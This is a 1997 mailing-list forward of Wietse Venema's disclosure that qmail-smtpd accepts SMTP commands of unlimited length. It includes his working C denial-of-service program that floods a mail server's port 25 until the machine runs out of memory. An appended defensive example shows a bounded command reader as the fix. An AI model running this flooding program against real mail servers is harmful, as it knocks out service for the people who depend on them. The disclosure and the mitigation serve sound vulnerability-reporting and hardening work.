[Frank DENIS -Jedi/Sector One- <j@EIDER.NET>] Denial of service (qmail-smtpd)



WRT the recent discussion of which should be the default mailer in
Debian, let's keep the below in mind:

-- 
John Goerzen          | Running Debian GNU/Linux (www.debian.org)
Custom Programming    | 
jgoerzen@complete.org | 
--- Begin Message ---
Forwarded message:
>From djb-qmail-return-3259-j=4u.net@koobera.math.uic.edu Wed Jun 11 21:31:02 1997
Delivered-To: j@mail.donald.fr
Delivered-To: j@mail-gw.donald.fr
Delivered-To: j-one-j@rtc-one.net
Mailing-List: contact djb-qmail-help@koobera.math.uic.edu; run by ezmlm
Delivered-To: mailing list djb-qmail@koobera.math.uic.edu
Delivered-To: djb-qmail@koobera.math.uic.edu
Message-Id: <199706112130.QAA09923@spike.porcupine.org>
Subject: Denial of service (qmail-smtpd)
To: djb-qmail@koobera.math.uic.edu
Date: Wed, 11 Jun 1997 17:30:36 -0400 (EDT)
From: wietse@wzv.win.tue.nl (Wietse Venema)
Organization: Wietse Venema on sabattical leave,
              14 Nosband Avenue 4J, White Plains, NY 10605, USA
X-Phone:      +1 914 948 7129
X-Time-Zone:  USA EST, 6 hours behind central European time
X-Mailer: ELM [version 2.4ME+ PL15 (25)]
MIME-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit

While implementing my own mailer, I went over the qmail source code
and noticed that qmail is susceptible to a very trivial denial of
service attack. By sending SMTP commands of unlimited length, an
attacker can make the machine run out of memory, thus rendering it
completely unusable.

Below is a little program that demonstrates the problem.  When I
wrote this I was in C mode; it could probably be done with a much
smaller PERL program.

Fix: put some upper bound on the amount of data that qmail-smtpd
reads per command.

I am sending to the list, because it appears that DJB is ignoring
all my email. Oh well. Be a good sport, Dan, and take care of it.

        Wietse

 /*
  * qmail-dos-1 - run a qmail system out of swap space by feeding long SMTP
  * commands.
  *
  * Usage: qmail-dos-1 hostname
  *
  * Author: Wietse Venema. The author is not responsible for abuse of this
  * program. Use at your own risk. Batteries not included.
  */
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>
#include <string.h>
#include <stdarg.h>
#include <errno.h>
#include <stdio.h>

void    fatal(char *fmt,...)
{
    va_list ap;

    va_start(ap, fmt);
    vfprintf(stderr, fmt, ap);
    va_end(ap);
    putc('\n', stderr);
    exit(1);
}

int     main(int argc, char **argv)
{
    struct sockaddr_in sin;
    struct hostent *hp;
    char    buf[BUFSIZ];
    int     sock;
    FILE   *fp;

    if (argc != 2)
        fatal("usage: %s host", argv[0]);
    if ((hp = gethostbyname(argv[1])) == 0)
        fatal("host %s not found", argv[1]);
    memset((char *) &sin, 0, sizeof(sin));
    sin.sin_family = AF_INET;
    memcpy((char *) &sin.sin_addr, hp->h_addr, sizeof(sin.sin_addr));
    sin.sin_port = htons(25);
    if ((sock = socket(AF_INET, SOCK_STREAM, 0)) < 0)
        fatal("socket: %s", strerror(errno));
    if (connect(sock, (struct sockaddr *) & sin, sizeof(sin)) < 0)
        fatal("connect to %s: %s", argv[1], strerror(errno));
    if ((fp = fdopen(sock, "r+")) == 0)
        fatal("fdopen: %s", strerror(errno));
    if (fgets(buf, sizeof(buf), fp) == 0)
        fatal("connection lost");
    memset(buf, 'X', sizeof(buf));
    fseek(fp, 0L, SEEK_SET);
    while (fputs(buf, fp) != EOF)
         /* void */ ;
}


--
                  -=-  Frank DENIS aka Jedi/Sector One  -=-
                  <j@djweb.org> <j@donald.fr> <j@eider.net>



--- End Message ---
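
The fix proposed in the forwarded message is an upper bound on the data read per SMTP command. One way to write that as a fixed-memory line reader is shown below. It is an added example, not code from the original message or from qmail. The names `cmd_reader`, `cmd_feed` and `feed_all` are hypothetical, the 512-octet limit is taken from RFC 5321 section 4.5.3.1.4, and `MAX_DISCARD` is an assumed local policy value.

```c
#include <stdio.h>
#include <string.h>
#define MAX_CMD     512   /* octets per command line incl. CRLF (RFC 5321, 4.5.3.1.4) */
#define MAX_DISCARD 4096  /* assumed policy: excess bytes tolerated before hanging up */
enum cmd_status { CMD_MORE, CMD_READY, CMD_TOO_LONG, CMD_ABORT };
struct cmd_reader {
    char   line[MAX_CMD];   /* fixed storage: memory use never depends on the client */
    size_t len, discarded;  /* bytes stored / excess bytes dropped, current line */
};

/* Feed one received byte; the result tells the caller what to do next. */
enum cmd_status cmd_feed(struct cmd_reader *r, unsigned char c)
{
    if (c != '\n') {
        if (r->len < MAX_CMD - 1)
            r->line[r->len++] = (char) c;
        else if (++r->discarded > MAX_DISCARD)  /* drop the byte, never grow a buffer */
            return CMD_ABORT;                   /* caller closes the connection */
        return CMD_MORE;
    }
    int too_long = r->discarded > 0;
    if (r->len > 0 && r->line[r->len - 1] == '\r') r->len--;
    r->line[r->len] = '\0';                     /* command text with CRLF stripped */
    r->len = r->discarded = 0;
    return too_long ? CMD_TOO_LONG : CMD_READY; /* TOO_LONG: reject, stay in sync */
}

/* Push a chunk through the reader, counting accepted and rejected commands. */
enum cmd_status feed_all(struct cmd_reader *r, const char *p, size_t n, int *ok, int *bad)
{
    enum cmd_status st = CMD_MORE;
    for (size_t i = 0; i < n && st != CMD_ABORT; i++) {
        st = cmd_feed(r, (unsigned char) p[i]);
        *ok += (st == CMD_READY);
        *bad += (st == CMD_TOO_LONG);
    }
    return st;
}

int main(void)
{
    static char flood[MAX_CMD + MAX_DISCARD];   /* constructed input: no newline, ever */
    struct cmd_reader r = {0};
    int ok = 0, bad = 0;
    memset(flood, 'X', sizeof flood);
    feed_all(&r, "HELO client.example\r\n", 21, &ok, &bad);
    int aborted = feed_all(&r, flood, sizeof flood, &ok, &bad) == CMD_ABORT;
    printf("accepted=%d rejected=%d aborted=%d\n", ok, bad, aborted);
    return 0;
}
```

An over-long line that does end in a newline is rejected as a unit, so the next command is still parsed correctly; a line that never ends returns `CMD_ABORT` once the discard budget is spent.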